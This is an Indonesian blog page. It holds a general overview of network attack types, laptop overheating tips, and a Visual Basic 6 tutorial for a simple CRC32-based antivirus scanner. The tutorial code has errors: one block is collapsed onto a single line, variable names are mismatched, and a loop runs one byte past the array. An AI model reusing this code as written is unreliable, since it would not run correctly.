Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan

5. Fragmented Packet Attacks
Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol

6. E-mail Exploits
Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function)

7. DNS and BIND Vulnerabilities
Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation)

8. Password Attacks
Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password.

Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, kracking dan sniffing

9.Proxy Server Attacks
Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network

10. Remote Command Processing Attacks
Trusted Relationship antara dua atau lebih host Menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network).
Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya

11. Remote File System Attack
Protocol-protokol untuk tranportasi data ?tulang punggung dari internet? adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file

12. Selective Program Insertions
Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor

13. Port Scanning
Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack

14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like

15. HTTPD Attacks
Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods

Semoga bermanfaat.!!!!
Reade more >>

Cara Mengatasi Panas Berlebih atau Overheat Pada PC Atau Laptop

Panas berlebih atau overheat pada PC atau pada laptop akan sangat menggangu aktifitas pekerjaan, karena panas berlebih itu akan membuat PC atau laptop kita menjadi mudah hang, sedikit informasi yang bermanfaat bagaimana mengasi panas berlebih pada PC atau laptop.

Penyebab terjadi overheat adalah pada sistem pendinginan yang bermasalah, permasalahan pendinginan meliputi fan heatsink atau kisi-kisi pendingin yang bermasalah, berikut rincian yang dapat kita lakukan jika mengalami overheat pada PC atau pada laptop kita.

Overheat pada PC dan laptop banyak terjadi karena karena sistem pendingin kotor, dikarenakan debu ataupun karena benda-benda yang masuk tersedot kedalam sistem pendinginan.

Pada PC seringkali bermasalah pada fan pendingin dan heatsink, karena kotor fan mengalami penurunan putaran yang menyebabkan tidak optimalnya putaran fan pendingin dan heatsink kotor akan menghambat sirkulasi udara dari fan ke heatsink. Untuk mengatasi hal tersebut dapat dilakukan pembersihan pada fan dan heatsink dan jika perlu diganti sebaiknya ganti fan agar tidak merusak processor.

Pada laptop seringkali permasalahan terjadi pada kisi-kisi pendinginan hal ini banyak dikarenakan banyak benda-benda aneh yang terkadang masuk kedalam sistem pendingin, debu, serabut karpet, kecoak bahkan tidak jarang saya jumpai cecak yang menjadi tulang belulang pun dapat masuk. Untuk mengatasinya sebaiknya lakukan pembongkaran pada laptop agar tidak merusak bagian-bagian lain seperti processor atau chip vga, yang rentan rusak ketika terjadi overheat.

Selain cara diatas kita juga dapat menambahan pendingin tambahan dibawah laptop kita, meskipun bukan solusi tapi cara ini yang paling praktis dan banyak dilakukan, semoga informasi diatas banyak membantu mengurangi overheat yang terjadi pada PC dan laptop.
Reade more >>

Saturday, August 13, 2011

yok kita intip cara membuat anti VIRUS............


Pertama kita harus mengerti bagaimana cara kerja
sebuah AV sederhana, pada dasarnya sebuah software AV mempunyai
komponen-komponen :

1. Engine scanner, ini merupakan komponen utama AV
dalam mengenali sebuah pattern virus. Engine ini dapat dikelompokkan
menjadi statis dan dinamis. Statis dalam hal ini dapat disebut menjadi
spesifik terhadap pattern tertentu dari sebuah file virus. Checksum
merupakan salah satu contoh dari engine statis ini. Dinamis dalam
artian dia mengenali perilaku ‘umum’ sebuah virus. Heuristic menjadi
salah satu contohnya.

2. Database definition, menjadi sebuah referensi dari sebuah pattern
file virus. Engine statis sangat bergantung kepada komponen ini.

3. Decompress atau unpacking engine, khusus untuk pengecekan file-file
yang terkompresi (*.rar, *.zip, dll) atau kompresi atau packing untuk
file PE seperti UPX, MeW , dll.

Tidak jarang hasil dari pengecekan terhadap file
suspect virus menghasilkan false-positive bahkan false-negative (–
false-positive berarti file yang bersih dianggap thread oleh AV, dan
false-negative berarti file yang 100% thread akan dianggap bersih).
Semua itu dapat diakibatkan oleh ketidak-sempurnaan dari engine scanner
itu sendiri. Misal

pada contoh kasus Engine String scanner (–Engine scanner yang
menyeleksi string-string dari file text-based), bila diterapkan rule 3
out of 5 (– bila AV menemukan 3 dari daftar 5 string kategori
malicious) maka AV akan memberikan bahwa file terindikasi sebuah thread
yang positif. Padahal file tsb nyatanya tidak menimbulkan efek
berbahaya bila dijalankan atau dieksekusi. Kesalahan scanning macam ini
lazim ditemukan untuk file-file *.VBS, *.HTML, dll. Untuk penggunaan
engine checksum sangat banyak ditemui di beberapa software AV lokal.
Checksum yang lazim digunakan diantaranya CRC16, CRC32, MD5, dll.
Dikarenakan mudah untuk diimplementasikan. Engine ini sendiri bukannya
tanpa cacat, Checksum bekerja dengan memproses byte demi byte dari
sebuah file dengan sebuah algoritma tertenu (– tergantung dari jenis
checksum yang digunakan) sehingga menghasilkan sebuah format tertentu
dari file tsb. Contoh checksum menggunakan CRC32 dan MD5 :

* calCrc = CRC32(file_name_and_path)

* calMD5 = MD5(file_name_and_path)

Maka isi dari string calCrc adalah 7AF9E376,
sedangkan untuk MD5nya adalah 529CA8050A00180790CF88B63468826A. Perlu
diketahui bila virus menerapkan rutin yang mengubah byte tertentu dari
badan virus tsb setiap kali maka penggunaan engine checksum ini akan
kurang optimal karena bila 1 byte berubah dari file maka checksum juga
akan berubah.

Mari kita belajar membuat sebuah AV sederhana, yang diperlukan :

1. Software Visual Basic 6.0

2. Sedikit pemahaman akan pemograman Visual Basic 6.0

3. Sampel file bersih atau virus (– opsional)

First#

Sekarang kita akan belajar membuat sebuah rutin sederhana untuk :

- Memilih file yang akan dicek

- Membuka file tersebut dalam mode binary

- Memproses byte demi byte untuk menghasilkan Checksum

Buka MS-Visual Basic 6.0 anda, lalu buatlah sebuah
class module dan Form dengan menambahkan sebuah objek Textbox,
CommonDialog dan Command Button. (Objek CommonDialog dapat ditambahkan
dengan memilih Project -> COmponent atau Ctrl-T dan memilih
Microsoft Common Dialog Control 6.0) Ketikkan kode berikut pada class
module (kita beri nama class module tsb clsCrc) :

================= START HERE ====================

Private crcTable(0 To 255) As Long ‘crc32

Public Function CRC32(ByRef bArrayIn() As Byte, ByVal lLen As Long, Optional ByVal lcrc As Long = 0) As Long

‘bArrayIn adalah array byte dari file yang dibaca, lLen adalah ukuran atau size file

Dim lCurPos As Long ‘Current position untuk iterasi proses array bArrayIn

Dim lTemp As Long ‘variabel temp hasil perhitungan

If lLen = 0 Then Exit Function ‘keluar fungsi apabila ukuran file = 0

lTemp = lcrc Xor &HFFFFFFFF

For lCurPos = 0 To lLen

lTemp = (((lTemp And &HFFFFFF00) \\ &H100) And &HFFFFFF) Xor (crcTable((lTemp And 255) Xor bArrayIn(lCurPos)))

Next lCurPos

CRC32 = lTemp Xor &HFFFFFFFF

End Function

Private Function BuildTable() As Boolean

Dim i As Long, x As Long, crc As Long

Const Limit = &HEDB88320

For i = 0 To 255

crc = i

For x = 0 To 7

If crc And 1 Then

crc = (((crc And &HFFFFFFFE) \\ 2) And &H7FFFFFFF) Xor Limit

Else

crc = ((crc And &HFFFFFFFE) \\ 2) And &H7FFFFFFF

End If

Next x

crcTable(i) = crc

Next i

End Function

Private Sub Class_Initialize()

BuildTable

End Sub

================= END HERE ====================

Lalu ketikkan kode berikut dalam event Command1_Click :

================= START HERE ====================

Dim namaFileBuka As String, HasilCrc As String

Dim CCrc As New clsCrc ‘bikin objek baru dari class ClsCrc

Dim calCrc As Long

Dim tmp() As Byte ‘array buat file yang dibaca

Private Sub Command1_Click()

CommonDialog1.CancelError = True ‘error bila user mengklik cancel pada CommonDialog

CommonDialog1.DialogTitle = “Baca File” ‘Caption commondialog

On Error GoTo erorhandle ‘label error handle

CommonDialog1.ShowOpen

namafilbuka = CommonDialog1.FileName

Open namafilbuka For Binary Access Read As #1 ‘buka file yang dipilih dengan akses baca pada mode binary

ReDim tmp(LOF(1) – 1) As Byte ‘deklarasi ulang untuk array, # Bugs Fixed #

Get #1, , tmp()

Close #1

calCrc = UBound(tmp) ‘mengambil ukuran file dari array

calCrc = CCrc.CRC32(tmp, calCrc) ‘hitung CRC

HasilCrc = Hex(calCrc) ‘diubah ke format hexadesimal, karena hasil perhitungan dari class CRC masih berupa numeric

Text1.Text = HasilCrc ‘tampilkan hasilnya

Exit Sub

erorhandle:

If Err.Number <> 32755 Then MsgBox Err.Description ‘error number
32755 dalah bila user mengklik tombol cancel pada saat memilih file

================= END HERE ====================

COba anda jalankan program diatas dengan memencet
tombol F5, lalu klik Command1 untuk memilih dan membuka file. Maka
program akan menampilkan CRC32nya.

Second#

Kode diatas dapat kita buat menjadi sebuah rutin pengecekan file
suspect virus dengan antara membandingkan hasil CRC32nya dan database
CRC kita sendiri. Algoritmanya adalah :

- Memilih file yang akan dicek

- Membuka file tersebut dalam mode binary

- Memproses byte demi byte untuk menghasilkan Checksum

- Buka file database

- Ambil isi file baris demi baris

- Samakan Checksum hasil perhitungan dengan checksum dari file

Format file database dapat kita tentukan sendiri, misal :

- FluBurung.A=ABCDEFGH

- Diary.A=12345678

Dimana FluBurung.A adalah nama virus dan ABCDEFGH dalah Crc32nya. Jika
kita mempunyai format file seperti diatas, maka kita perlu membaca file
secara sekuensial per baris serta memisahkan antara nama virus dan
Crc32nya. Dalam hal ini yang menjadi pemisah adalah karakter ‘=’.

Buat 1 module baru (– diberi nama module1) lalu isi dengan kode :

================= START HERE ====================

Public namaVirus As String, CrcVirus As String
‘deklarasi variabel global untuk nama dan CRC virus Public pathExe as
String ‘deklarasi variabel penyimpan lokasi file EXE AV kita

Public Function cariDatabase(Crc As String, namaFileDB As String) As Boolean

Dim lineStr As String, tmp() As String ‘variabel penampung untuk isi file

Open namaFileDB For Input As #1 ‘buka file dengan mode input

Do

Line Input #1, lineStr

tmp = Split(lineStr, “=”) ‘pisahkan isi file bedasarkan pemisah karakter ‘=’

namaVirus = tmp(0) ‘masukkan namavirus ke variabel dari array

CrcVirus = tmp(1) ‘masukkan Crcvirus ke variabel dari array

If CrcVirus = Crc Then ‘bila CRC perhitungan cocok/match dengan database

cariDatabase = True ‘kembalikan nilai TRUE

Exit Do ‘keluar dari perulangan

End If

Loop Until EOF(1)

Close #1

End Function

================= END HERE ====================

Lalu tambahkan 1 objek baru kedalam Form, yaitu
Command button2. lalu ketikkan listing kode berikut kedalam event
Command2_Click :

================= START HERE ====================

If Len(App.Path) <= 3 Then ‘bila direktori kita adalah root direktori pathEXE = App.Path Else pathEXE = App.Path & “\\” End If CommonDialog1.CancelError = True ‘error bila user mengklik cancel pada CommonDialog CommonDialog1.DialogTitle = “Baca File” ‘Caption commondialog On Error GoTo erorhandle ‘label error handle CommonDialog1.ShowOpen namafilbuka = CommonDialog1.FileName Open namafilbuka For Binary Access Read As #1 ‘buka file yang dipilih dengan akses baca pada mode binary ReDim tmp(LOF(1) – 1) As Byte ‘deklarasi ulang untuk array # Bugs Fixed # Get #1, , tmp() Close #1 calCrc = UBound(tmp) ‘mengambil ukuran file dari array calCrc = CCrc.CRC32(tmp, calCrc) ‘hitung CRC HasilCrc = Hex(calCrc) ‘diubah ke format hexadesimal, karena hasil perhitungan dari class CRC masih berupa numeric If cariDatabase(HasilCrc, pathEXE & “DB.txt”) Then ‘bila fungsi bernilai TRUE MsgBox “Virus ditemukan : ” & namaVirus ‘tampilkan message Box End If Exit Sub erorhandle: If Err.Number <> 32755 Then MsgBox Err.Description ‘error number
32755 dalah bila user mengklik tombol cancel pada saat memilih file

================= END HERE ====================

Fitur AV sederhana ini dapat ditambahkan dengan
fitur process scanner, akses registry, real-time protection (RTP) dan
lain lain. Untuk process scanner pada dasarnya adalah teknik enumerasi
seluruh proses yang sedang berjalan pada Sistem Operasi, lalu mencari
letak atau lokasi file dan melakukan proses scanning.

Sumber : http://orispyro.wordpress.com/
Reade more >>

Followers

visitor of state

like me on FaceBook